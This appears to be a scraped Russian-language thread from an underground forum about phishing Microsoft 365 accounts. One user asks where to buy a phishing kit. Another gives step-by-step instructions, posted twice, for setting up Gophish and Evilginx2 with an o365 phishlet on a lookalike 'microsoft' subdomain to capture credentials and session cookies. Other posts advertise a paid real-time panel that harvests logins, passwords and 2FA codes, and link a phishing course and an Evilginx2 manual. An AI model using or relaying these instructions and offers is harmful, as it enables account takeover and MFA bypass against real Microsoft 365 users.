hackerman_228
Light Weight
- Депозит
- $0
Кто подскажет, где можно взять/приобрести годный кит с фишингом ms365?
Runion
This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!
Фишинг под Microsoft365
- Thread starter hackerman_228
- Start date
perceptron
Light Weight
- Депозит
- $0
Скрытый контент для пользователей: hackerman_228, Simba.
Последнее редактирование: 11.11.2020
Последнее редактирование: 11.11.2020
hackerman_228
Light Weight
- Депозит
- $0
Огромное спасибо, мира, добра, валида тебе)
Относительно дешевый способ)
1. Покупаете VPS;
2. Покупаете домен с хостингом (в записи DNS добавляете subdomains microsoft);
3. Идете на mailgun и верифицируете там свой домен (для отправки писем);
4. На VPS ставите Gophish (для отправки писем) и Evilgnix2 (для перехвата данных и кукис);
5. Поднимаете Gophish;
6. Поднимаете Evilgnix2:
: config domain phishdomain.com; - конфигурация вашего домена
: config ip 'your hosts's ip'; - конфигурация вашего VPS (где запущен Evilgnix2)
: phishlets hostname o365 microsoft.phishdomain.com; - прикручивание фишлета o365 к вашему домену
: phishlets enable o365; - включение фишлета
: lures create o365;
: lures get-url 1(or other ID);
1. Покупаете VPS;
2. Покупаете домен с хостингом (в записи DNS добавляете subdomains microsoft);
3. Идете на mailgun и верифицируете там свой домен (для отправки писем);
4. На VPS ставите Gophish (для отправки писем) и Evilgnix2 (для перехвата данных и кукис);
5. Поднимаете Gophish;
6. Поднимаете Evilgnix2:
: config domain phishdomain.com; - конфигурация вашего домена
: config ip 'your hosts's ip'; - конфигурация вашего VPS (где запущен Evilgnix2)
: phishlets hostname o365 microsoft.phishdomain.com; - прикручивание фишлета o365 к вашему домену
: phishlets enable o365; - включение фишлета
: lures create o365;
: lures get-url 1(or other ID);
Here's a video course of pretty much what he just explained above. This is not my channel and I don't vouch for him in any way, I just remembered getting this a little while ago and thought it could help people here
Hacking Exploits in Hacker Chatroom
Practical Phishing course 
How to setup phishing infrastructure. How to launch your campaign. How to bypass MFA. How to evade spam filters. Credential capturing. Post engagement activities such as reporting. Considerations for blue team. Advice from real phishing engagements. 
...
t.me
Hacking Exploits in Hacker Chatroom
Practical Phishing course How to setup phishing infrastructure. How to launch your campaign. How to bypass MFA. How to evade spam filters. Credential capturing. Post engagement activities such as reporting. Considerations for blue team. Advice from real phishing engagements. ...t.me
expert_kalash
Midle Weight
- Депозит
- $0
Есть реалтайм панель для 365, собирает логин пасс 2фа, юзер инфо.
GIF: https://s6.gifyu.com/images/365.gif
Если нужно обращайтесь.
GIF: https://s6.gifyu.com/images/365.gif
Если нужно обращайтесь.
Spear Phishing on Modern Platforms
Spear phishing is a social engineering activity intended to simulate a realistic attack scenario with the intent of bypassing technical security controls and persuading employees to perform various actions.
www.optiv.com
Полный мануал с установкой o365 evilginx2
Spear phishing is a social engineering activity intended to simulate a realistic attack scenario with the intent of bypassing technical security controls and persuading employees to perform various actions.
www.optiv.com
Полный мануал с установкой o365 evilginx2